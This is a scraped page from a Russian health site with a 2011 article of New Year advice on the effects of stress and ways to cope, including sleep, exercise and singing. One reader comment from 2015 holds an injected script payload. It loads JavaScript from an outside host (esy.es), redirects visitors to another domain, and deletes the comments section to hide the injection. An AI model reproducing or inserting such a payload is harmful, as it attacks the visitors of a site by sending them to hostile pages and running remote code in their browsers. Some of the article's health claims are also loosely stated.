Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новогодние советы. Как по...  >>  Новогодние советы. Как побороть стресс
 
Обратная связь
 

Новогодние советы. Как побороть стресс

Размер шрифта
25 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Как ни странно, именно во время праздников мы чаще всего испытываем стресс. Любая неудача портит нам настроение, и мы считаем, что каникулы не удались. Но когда же тогда радоваться, если не в праздники?

К чему приводит стресс?

  1. Депрессия. Если вы находитесь в постоянном стрессе, то рано или поздно это доведет до реактивной депрессии – расстройства, которое возникает в ответ на постоянное напряжение. При депрессии человек теряет интерес ко всему, его мучают мысли о самоубийстве.

  2. Головная боль. Мигрени – частые спутники стресса. Как правило, головная боль возникает на фоне сильных переживаний, нервного перенапряжения после ответственной работы.

  3. Учащенное сердцебиение. Стрессовые ситуации заставляют наше сердце биться часто. А постоянные стрессы вызывают тахикардию – заболевание, при котором нарушается работа сердца, понижается артериальное давление, уменьшается приток крови к органам и повышаются риски инфаркта миокарда.

  4. Бессонница. Стресс и хроническая усталость, как ни странно, приводят к бессоннице. Казалось бы, после тяжелого дня сил хватает только на то, чтобы дойти до кровати. Однако постоянный стресс и усталость изнашивают нервную систему и лишают сна.

  5. Ожирение. Наверняка каждый знает, что верный способ улучшить настроение – съесть шоколадку. Однако радость от сладкого быстро проходит: углеводы моментально всасываются в кровь, мы снова впадаем в уныние, а аппетит только усиливается, увеличивается вес.

Это далеко не все последствия стресса, однако их достаточно, чтобы испортить новогодние праздники.

Как бороться со стрессом

  1. Высыпайтесь. Соблюдайте режим сна. Именно во сне вырабатывается серотонин – гормон, который обеспечивает нас хорошим настроением на весь день. Ложитесь спать не позже 22 часов и спите не менее 7 часов.

  2. Не заедайте стресс. Когда мы нервничаем, в нашем организме дефицит серотонина – гормона радости. Пытаясь его восполнить, мы едим сладкое и набираем лишние килограммы. Чтобы ожирение не стало еще одной причиной стресса, больше двигайтесь и занимайтесь спортом: и настроение улучшится, и калории потратите.

  3. Пойте. Традиционное русское застолье никогда не обходится без песни. И неспроста: пение – настоящая дыхательная гимнастика. Во время пения мы глубоко дышим, в легкие поступает много кислорода, это приводит к усиленному кровоснабжению мозга и выработке гормонов радости: эндорфина, серотонина. Именно эти гормоны делают нас счастливыми.

Кстати, именно на этом принципе работают и так популярны все клубы караоке, куда люди приходят зарядиться положительными эмоциями.

Прибираясь в квартире, наряжая елку, накрывая на стол, пойте. И вам будет радостно готовиться к Новому году.

Именно в форме песни ведущие программы «Здоровье» Дмитрий Шубин, Герман Гандельман, Андрей Продеус научат вас, как не позволить стрессу испортить новогодние праздники. А заодно расскажут, как познакомились друг с другом, и как началась их дружба.

Видеосюжеты по теме:

Новогодние советы. Боритесь со стрессом



 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что с вами делает злость?   Болезни-близнецы. Депрессия и гипотиреоз   Как мы реагируем на стресс   Как не грустить в новом году  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 30 мая 2013Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать
 
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 01 апреля 2013Сладкие газировки вызывают депрессию
 

Слайдшоу

1
Как студенческая жизнь влияет на здоровье
Что не дает вам заняться сексом
Вся правда о депрессии

Тесты

1
Что вы знаете о депрессии?
Есть ли у вас анемия?
Нормальный ли у вас сон?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.